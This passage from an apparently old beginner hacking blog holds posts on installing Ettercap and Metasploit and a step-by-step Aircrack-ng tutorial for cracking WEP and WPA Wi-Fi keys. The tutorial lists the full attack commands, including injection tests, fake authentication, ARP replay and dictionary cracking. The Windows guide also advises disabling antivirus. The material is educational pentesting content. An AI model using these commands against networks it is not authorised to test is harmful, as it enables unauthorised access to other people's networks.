<li>First, download the Ettercap "tar" file that we are going to extract and install, the newest (0.7.3) version located <a href="http://prdownloads.sourceforge.net/ettercap/ettercap-NG-0.7.3.tar.gz?download">here</a>. If you want to take a look at all versions available (they may become updated and I might not update this post in time), take a look <a href="http://ettercap.sourceforge.net/download.php">here</a>.</li>
<li>Once you've downloaded the file to either your root, home, or desktop (as we did while installing aircrackng), you need to issue the command in a new terminal to unpackage the tar file.<br />
Open a terminal and type "tar -xvf [file name]" to unpackage them. What the "xvf" means is told in the aircrackng installation guide, but I'll list them here as well.<br />
x --- extract<br />
v --- verbose<br />
f --- file [file] (necessary to determine the file).</li>
<li>Once you've unpackaged the tar file, navigate into the folder that was just created, usually named after the file we downloaded/extracted (in this case "ettercap-NG-0.7.3"), but type "ls" into your terminal to check what it is called, then "cd" command into that folder.<br />
I typed: "cd ettercap-NG-0.7.3"</li>
<li>Next, while in the folder you extracted, type the command "make" and then once that command is done, "make install" which should install the program and make it usable by you.</li>
</ul>
As you can probably tell by these two installations, most are pretty easy! Just remember that tar files are pretty much zip files on Windows systems (I imagine most of you know Windows well), and using the "tar" command on the file is extracting it to a folder (as you've seen on Windows/Mac systems). The "cd" command is probably the most useful command in the *nix arsenal, and moves you from folder to folder where you can use the "make" and "make install" commands to install programs!<br />
<br />
As always, post stuff below. I realize this is simple, but for newbies of Linux it's not, so please understand this before posting. Any comments are welcomed though; pointers and help always appreciated (the Reddit community has helped in major ways so far. I don't take criticism as you tearing me down, this is a blog for newbies; we're all learning!).</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-81357495383586025532011-06-25T18:37:00.017-04:002022-12-20T10:46:30.117-05:00[OLD] Installing Metasploit [Linux/Now Updated with Windows!]<div dir="ltr" style="text-align: left;" trbidi="on">
Now that I've briefly covered some WEP/WPA cracking, lets install an important tool to our arsenal for issuing exploits and "payloads" (a name for exploits).<br />
<br />
This program is called "Metasploit" and is considered by many to be one of the most important hacking/pentesting tools around. It has an amazing array of exploits that can be used on many vulnerable machines, and when coupled with the vulnerability scanner Nessus (I'll cover this in the future) becomes a highly sophisticated tool we can use to hack into and secure our networks.<br />
<br />
I'm installing this on Ubuntu Gnome Backtrack 5 (the newest release), so if you're on a different GUI (like KDE) and aren't using BT5, some things might be different.<br />
<br />
NOTE: It may be useful for new users to check out my <a href="http://hackavision.blogspot.com/2011/06/quick-overview-of-linux-commands-linux.html">Linux commands overview</a> that I recently updated (the day this post was released).<br />
<br />
Hopefully you know the basics of Linux navigation and listing commands, so lets begin.<br />
<a name='more'></a>For those running Linux 32 bit like me, download <a href="http://updates.metasploit.com/data/releases/framework-3.7.2-linux-full.run">this</a> and save it to your computer. For 64 bit, download <a href="http://updates.metasploit.com/data/releases/framework-3.7.2-linux-x64-full.run">this</a> and save it to your computer. <br />
These are both the full installations because I'm assuming you, like me, do not have the dependencies already installed (which are NOT optional).<br />
<br />
Once you have them downloaded (they may take a while), open a new terminal console and enter the command to navigate to the directory that it is saved on. If you saved it to your desktop like me, all I type is "cd Desktop" (capitalization is necessary; Linux is case-sensitive; a doesn't mean A) and can confirm this with a "pwd" command. If you saved it in your Home directory (where the cd command alone takes you), try issuing an "ls" command to make sure it's there.<br />
<br />
Once you're in the correct directory, type "chmod +x framework-3.*-linux-full.run" which runs the "chmod" command with the option "+x" on your downloaded file. This changes the permissions of this file to add "executable" so we can run it.<br />
Next, we need to run this executable! Type: "./framework-3.*-linux-full.run" and it should bring up the install GUI (graphical user interface) in a few seconds (or minutes if your computer is slower like mine). <br />
<br />
<ul>
<li>The first screen will be a welcome screen, just click "forward" and move on.</li>
</ul>
<ul>
<li>The next screen is Metasploit's license agreement. Read it if you want then click "I accept the agreement" and then "forward."</li>
</ul>
<ul>
<li>The next is where you want the Metasploit framework installed; I would keep it default (my default is /opt/framework-3.7.2). Click forward to continue. </li>
<ul>
<li>If after you push forward and it says it cannot be created because the directory is full or already exists, try renaming the installation path or check to see that Metasploit already isn't installed. If it isn't you can rename your old one and add ".bak" to make sure you don't screw anything up.</li>
<ul>
<li>To rename it using Gnome 32bit, click on "Places" then "Computer" then "root," then click on "go" in the taskbar and click "open parent" <b>OR</b> while in "Computer" hit "alt-up." <b>An easier way to do this may just be to click on "File system" but sometimes that just doesn't work or isn't located on the options.</b></li>
<li>Next, double click the "opt" folder. There should be a bunch of folders in here, one being the folder you're trying to install. Right click that folder and click "rename" and add ".bak" to the end of the file name. You should be all ready to install it now if you wish.</li>
</ul>
</ul>
</ul>
<ul>
<li>The next screen prompts for automatic updates. I highly suggest leaving this on "yes" so you always have up-to-date exploits on your hands. Click forward.</li>
<li>Your ready to install page should come up, click forward to start your installation! If you're stupid like me and hit "cancel" at any point, it will prompt to close again, so don't worry about hitting the key!</li>
<li>After you hit forward, it should start installing and have a task completion bar. Depending on your computer it may take a while to install.</li>
<ul>
<li>If you encounter an issue where it states that port 7175 is not open and it is closing installation due to this you have to change the Postgresql .conf (configure) file to start on port 7175 instead of the default 5xxx something. To do this, we are going to edit this file with our (meaning my) favorite Linux text editor-- Nano.<br />
Open a new terminal and navigate to your "/" folder. This may be your home on some computers, but my "home" is "/root," so I have to use the "cd" command to get there.<br />
How I navigate there is by typing "cd ../" which places me from my "/root" folder to my "/" folder (the ../ means go UP (back) a level).<br />
Next, I use my trusty "cd" command and type "cd etc" which brings me into me to "/etc" (if you type "pwd" it will show your location).</li>
<li> Then navigate into the "postgresql" folder with your cd command and further into the "8.4" and the "main folder within that (your location should be "/etc/postgresql/8.4/main." If your number isn't 8.4, use whatever version you have installed (as far as I know, 9.04 is out, but I haven't updated to it).<br />
Next, we're gonna edit the "postgresql.conf" file with our nano text editor. Type "nano postgresql.conf" while in the directory stated above and a text editor format will come up that you should be generally familiar with since it looks like most others. You can read all the comments (lines with "#" in them), or you can scroll down past the "File locations" to the "connection and authentication" section. From there, you should see a setting "port= 5432" or something of the sort. Edit that number to 7175 (or if your error gave you a different port, set it to that), then push control o (the "oh" key), then push enter to write the file (a small prompt will come up asking to write it, pushing enter confirms this). Then push control-z to exit the editor.<br />
A restart of your system is required after this fix, so restart and hopefully your postgresql will start on the correct port. Redo your installation (delete your old framework-3xxx folder) and do everything normal. If this doesn't work, post a comment below and I'll help you troubleshoot.</li>
</ul>
<li>Whoo, well, hopefully you didn't have that postgresql issue and it all installed fine, but if you did, read the block of text above and then come to this point. Once you have a successful install, you can try to update with the command "msfupdate" and run the program as "msfconsole."<br />
If you have any problems, ask below in a comment, email me, or @tweet me at my <a href="http://twitter.com/mjhallenbeck">twitter</a> account.<br />
You can navigate to the MSF3 files in the /opt/framework-3.7.2/msf3 directory and check out all the files listed there. There is a README file that may help you troubleshoot and figure out this amazing exploit program.</li>
</ul>
<br />
Leave comments below, opinions, any help or questions. I'll be updating this to make it easier to read and adding in troubleshooting but hopefully it helps some people right now.<br />
<br />
<span style="font-size: x-large;"><u><b>Installing the Metasploit Framework on Windows!</b></u></span><br />
<br />
Yep, finally more Windows content, and this time I'm updating my old Metasploit installation tutorial to include Windows!<br />
Lets jump right in.<br />
<br />
First, download <a href="http://updates.metasploit.com/data/releases/framework-4.0.0-windows-full.exe">this file</a> and save it to wherever you want. It is the FULL version of Metasploit including an updated Java and Postgresql. I'm linking this one since a lot of people don't have the necessary dependencies already, and it's easier just to be safe than sorry and have to re-download it or it not work at all.<br />
Once this is done downloading (it took about 5 minutes with a fast connection for me), double click it from your downloaded area or in your browsers download page to run the executable (.exe) file.<br />
<br />
The setup is quite normal. Just hit next to go to the License Agreement and either read it and accept or just accept it (who actually reads them?).<span id="goog_746750328"><br />
</span><span id="goog_746750329"></span><br />
The next page is the installation location. I left mine at the default which for me is "C:\Program Files\Rapid7\framework" and works unless you want it in a specific location.<br />
Hit next and it will ask if you want automatic updates. I'd suggest saying yes since it allows you to have updated exploits and payloads and all the goodies we will be using. Now hit next until it installs (the next page is useless).<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2TiV4ddP-d_oGZpulDT3FE2zcd_fLBb8ft43fQhnHwxsoJVkd3H50FATJeDp4OVktgwagaNSU60aLgsXdyYJM_3VMlsEJC7D-YWErNXvcp3Gn6Fgk5qM-HcD1tbb8_q8dLw1dcDpif9I/s1600/1+-+installing.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="301" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2TiV4ddP-d_oGZpulDT3FE2zcd_fLBb8ft43fQhnHwxsoJVkd3H50FATJeDp4OVktgwagaNSU60aLgsXdyYJM_3VMlsEJC7D-YWErNXvcp3Gn6Fgk5qM-HcD1tbb8_q8dLw1dcDpif9I/s400/1+-+installing.JPG" width="400" /></a></div>
The Metasploit Framework might open up a few Consoles, but they should close quickly and you should let them do their thing. This is the program installing normally.<br />
If you use Microsoft Security Essentials or some other type of virus protection, I would suggest turning them off for the installation, then adding the location that you're downloading Metasploit to to your "excluded locations" or else this happens:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3208A0klyEv4KZ91TISKGKdMMSAknVK5g6H4cOpAUg1QF8dOlMZUQ6qzaQVkUnKOWO0L89hzn3NMrv3NW5kU2Vuguv-AZiEP8_BX_Et-pCxi2yfWmDOiUw2DXBmf5zi7BqQRFLUI-xcI/s1600/2+-+microsoft+essentials+alert.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="388" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh3208A0klyEv4KZ91TISKGKdMMSAknVK5g6H4cOpAUg1QF8dOlMZUQ6qzaQVkUnKOWO0L89hzn3NMrv3NW5kU2Vuguv-AZiEP8_BX_Et-pCxi2yfWmDOiUw2DXBmf5zi7BqQRFLUI-xcI/s400/2+-+microsoft+essentials+alert.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Oh noez D=</td></tr>
</tbody></table>
If this happens, allow the location by following the directions below and "allow" those files by changing them from "remove" to "allow" with the dropdown menu and hitting "apply actions"<br />
<br />
To allow this location this on MSE, click on the "settings" tab, then "excluded files and locations" and select your location (for me, Program Files -> Rapid7).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVU0CxMgUYZ1lBomds5B71qHICkm3hoU0NQzmMeYJtUJJht65ugGNIBax3pk8sABjUbLk7uH8i6-NLJyjsIUXfR2cC21nCd55yaV99xo_BQNJvnn2UhAbZqNFsaWy0cdVig6FtefSQWS0/s1600/3+-+allowing+metasploit+mse.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="317" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgVU0CxMgUYZ1lBomds5B71qHICkm3hoU0NQzmMeYJtUJJht65ugGNIBax3pk8sABjUbLk7uH8i6-NLJyjsIUXfR2cC21nCd55yaV99xo_BQNJvnn2UhAbZqNFsaWy0cdVig6FtefSQWS0/s400/3+-+allowing+metasploit+mse.JPG" width="400" /></a></div>
<br />
I would suggest allowing this location BEFORE continuing installation, as it may cause problems with the actual installation.<br />
Once it's done downloading you can just hit finish and it should all be ready to go. It won't open up right away and for me, it didn't create a desktop shortcut. So go into your Start menu and All Programs, then Metasploit Framework and open the Metasploit GUI (graphical user interface) first.<br />
If it's the first time opening it, it should say it's configuring, just hit OK and let it load.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxeIjuFLB3JBXJ8888jzMs_12hNQerfLtkzLxKJdVhEEeTaat1A2wDJyBmZVfZeHyaDRH9T9bmgHCVkmyMha8mzmfXcCleW9k6JdH_ZQQJlCGozEDM_bEHrJsGodtFQVNBcQk2gd0s9ew/s1600/4+-+Opening+Metasploit.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="276" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxeIjuFLB3JBXJ8888jzMs_12hNQerfLtkzLxKJdVhEEeTaat1A2wDJyBmZVfZeHyaDRH9T9bmgHCVkmyMha8mzmfXcCleW9k6JdH_ZQQJlCGozEDM_bEHrJsGodtFQVNBcQk2gd0s9ew/s400/4+-+Opening+Metasploit.JPG" width="400" /></a></div>
<br />
This is the Metasploit GUI, which I will go over quickly before moving to the (better in my opinion) console interface, which is much like the Linux version.<br />
<br />
Wow, so where to begin? Lets start by clicking on the "File" menu dropdown and clicking on "Show connection details"<br />
This is our current "connection" to Metasploit, and it shows what port we are running off of, our username and password, as well as our "host," which for me is "127.0.0.1" which is localhost, which is <em>our</em> computer, if you didn't know.<br />
In our "view" tab we can click on any of the options and it will switch to the tabs above. The only option we can use here that isn't on the tabs (like Firefox, Chrome, Opera, or any browser today uses) is the "preferences" which includes a few different things we can change around.<br />
<br />
[Last updated August 8th at 1:00pm]<br />
<ul></ul>
</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-42780914875299801612011-06-24T19:16:00.008-04:002022-12-20T10:46:31.663-05:00[OLD] Cracking WEP/WPA/2 networks with Aircrack-ng [Linux]<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" trbidi="on">
Now that you have hopefully installed the Aircrack-ng suite and familiarized yourself with some basic Linux commands, we can start cracking WEP and WPA1/2 networks to see the differences in securi<span class="Apple-style-span" style="font-family: inherit;">ty <span class="Apple-style-span" style="line-height: 15px;"><i style="font-style: normal;">Wired Equivalent Privacy</i></span> (WEP) and Wi-fi Protected Access (WPA) provide.</span><br />
<br />
<br />
<a name='more'></a><br />
<b>Notice: This is purely for educational value, do not attempt this on a network you do not PERSONALLY own. If you do this on a public or private network that you do not have authorization to do so on, it is illegal and you will probably get caught.</b><b data-darkreader-inline-bgcolor="" data-darkreader-inline-color="" style="--darkreader-inline-bgcolor: #131415; --darkreader-inline-color: #ffffff; background-color: #141414; color: white; font-family: arial, tahoma, helvetica, freesans, sans-serif; font-size: 13px; line-height: 18px;"><br />
</b><br />
Now, lets start. Open up a new terminal and lets begin (all typed commands are underlined; read the notes section for optional commands):<br />
<br />
<a href="http://www.blogger.com/post-edit.g?blogID=4181939565976903382&postID=4278091487529980161" name="more"></a><br />
<ol>
<li>Make sure you have a "monitoring" interface, this means that your network interface (the thing that interacts with networks) can scan for open/encrypted networks. <br />
To check what interfaces you have, type "iwconfig" into your terminal and it will list out which interfaces are currently up, and which mode they are in (look for "mode: managed" or "mode: monitor").<br />
Check out my <a href="http://hackavision.blogspot.com/2011/06/beginning-networking-in-ubuntu-linux.html">blog post about networking in Linux</a> for more on "iwconfig" and the different modes available.<br />
<br />
Type:<br />
<br />
<u>airmon-ng start [interface]</u><br />
<br />
if your interface is in "managed" or any other mode (ad-hoc, etc) it needs to be switched into monitor mode. Sometimes it will create a new interface for the monitoring, for example, my wireless is "wlan0" and it creates "wlan0mon" or "mon0" for monitoring. <br />
Once it is in "monitor" mode, you can begin.<br />
</li>
<li>Make sure you can inject packets into the chosen network (find a network with Kismet (I'll review Kismet later) or your network manager (either Wicd, or network-manager), or with the "airodump-ng [interface]" command in a new terminal. This creates a new .cap file, though).<br />
Type:<br />
<br />
<u>aireplay-ng -9 -e [network name] -a [your MAC address] [interface]</u><br />
<br />
This makes sure that you can use your network card to input packets (data) into the targeted network. Your NIC (network interface card) must support injection.<br />
</li>
<li>If you can inject, start dumping captured IVs (Initialization Vectors) into a .cap (capture) file with command:<br />
<br />
<u>airodump-ng (-c x) --bssid [target network MAC] -w [output prefix] [interface]</u><br />
<br />
Note: -c x is channel x, where x is 1-11 and not necessary, although, if you know the channel, I would suggest doing the correct channel.<br />
This will bring up a nice interface with your targeted network, the BSSID (MAC that you entered), the "PWR," or how close you are (lower is better!), the "Beacons," which networks send automatically, the #Data, which is the data packets that have been sent over the network (which you have just started capturing!), the #/s which is data packets/s (higher is better for capturing faster!), the "CH," or channel (I'll go over this later), the "MB," the "ENC," or encryption (WEP/WPA/OPEN), the CIPHER (related to the ENC), the AUTH (pass-key or other), and finally the ESSID which is the English or ASCII network name that humans understand more easily than a Hex BSSID.<br />
<br />
</li>
<li>Now we have to do a "fake authentication" on the network. This is pretty self explanatory, but it authenticates you with the access point. If you didn't run this, the access point would return "deauthenticated" packets, not allowing you to inject packets back into the system.<br />
<br />
Type:<br />
<br />
<u>aireplay-ng -1 0 -e [network name] -a [target network MAC] -h [your MAC address] [interface]</u><br />
<br />
It should respond "Association successful :-)" if not, try again until it works.<br />
This may take a while, so don't fret if it doesn't work right away. I've had to do this three or four times or more with new terminals and locations until I finally got it, it's just luck sometimes.<br />
</li>
<li>Reinject ARP (Address Resolution Protocol) packets back into the network to create network activity. To review ARP, check out my <a href="http://www.hackavision.com/2011/07/what-is-arp-information.html">ARP information post</a> and read it thoroughly, it isn't long and gives a good explaination what ARP is all about. What we're basically doing is sending fake messages to create data packets on the network so we can record and crack their password!<br />
<br />
Type:<br />
<br />
<u> aireplay-ng -3 -b [target network MAC] -h [your MAC address] [interface]</u><br />
<br />
It should say "Read xxxx packets (got xxxx ARP requests), sent xxxx packets..." and network activity should increase.<br />
</li>
<li>Crack the WEP key! Type:<br />
<br />
<u> aircrack-ng -b [target network MAC] *.cap</u><br />
<br />
Note: you can enter the ACTUAL file name instead of "*.cap" if you know it, or whatever "output prefix" you entered, then *.cap (all in a line, since it concatinates -xxxxx_xxxx after the prefix and before .cap).<br />
</li>
<li>Crack the WPA/WPA2 key (if you're not cracking WEP)! Type: <br />
<br />
<u> aircrack-ng -w [password list] -b [target network MAC] *.cap</u><br />
<br />
Note: You must have captured the WPA handshake, and again, substitute your capture file accordingly.</li>
</ol>
For WEP cracking, this should run a terminal with "Tested xxxx keys (got xxxx IVs) and a bunch of gibberish HEX underneath. You can run this while you inject packets. It should find the key eventually unless the network admin or creator disconnects the network or you go out of range of it. Sometimes it only takes as little as 5000 keys, and other times 250,000 keys.<br />
My record is about 2-3 minutes while sitting on a toilet in a flea market; it's fun to see how quickly WEP is broken, <b>so remember ALWAYS use WPA2 with a non-dictionary passkey.</b> You can review more tips about securing your home network at my post <a href="http://www.hackavision.com/2011/07/securing-your-personal-home-network.html">here</a>.<br />
<br />
For WPA cracking, it runs through a list of passwords (in Backtrack 5 there is a darkc0de.lst with almost a million, if not more, passwords) and checks every one for a match; thus taking quite a bit longer, and if the password is not in the list, impossible to crack through this method. <br />
<br />
For further in-depth reading on cracking WEP networks, check out <a href="http://eprint.iacr.org/2007/120.pdf">this paper</a>.<br />
<ol></ol>
The aircrack-ng suite includes the below programs, try playing around with them. If you enter the name then --help or -h, usually (almost always) a help page appears with all the commands you can enter.<br />
<br />
Name --- What program does<br />
<br />
aircrack-ng Cracks WEP and WPA (Dictionary attack) keys.<br />
airdecap-ng Decrypts WEP or WPA encrypted capture files with known key.<br />
airmon-ng Placing different cards in monitor mode.<br />
aireplay-ng Packet injector (Linux, and Windows [with Commview drivers]).<br />
airodump-ng Packet sniffer: Places air traffic into PCAP or IVS files and shows information about networks.<br />
airtun-ng Virtual tunnel interface creator.<br />
airolib-ng Stores and manages ESSID and password lists; Increases the KPS of WPA attacks<br />
packetforge-ng Create encrypted packets for injection.<br />
Tools Tools to merge and convert.<br />
airbase-ng Incorporates techniques for attacking client, as opposed to Access Points<br />
airdecloak-ng removes WEP cloaking from pcap files<br />
airdriver-ng Tools for managing wireless drivers<br />
airolib-ng stores and manages ESSID and password lists and compute Pairwise Master Keys<br />
airserv-ng allows you to access the wireless card from other computers.<br />
buddy-ng the helper server for easside-ng, run on a remote computer<br />
easside-ng a tool for communicating to an access point, without the WEP key<br />
tkiptun-ng WPA/TKIP attack<br />
wesside-ng automatic tool for recovering wep key.<br />
<br />
Last updated at 10:30am on July 27th, 2011.</div>
</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.com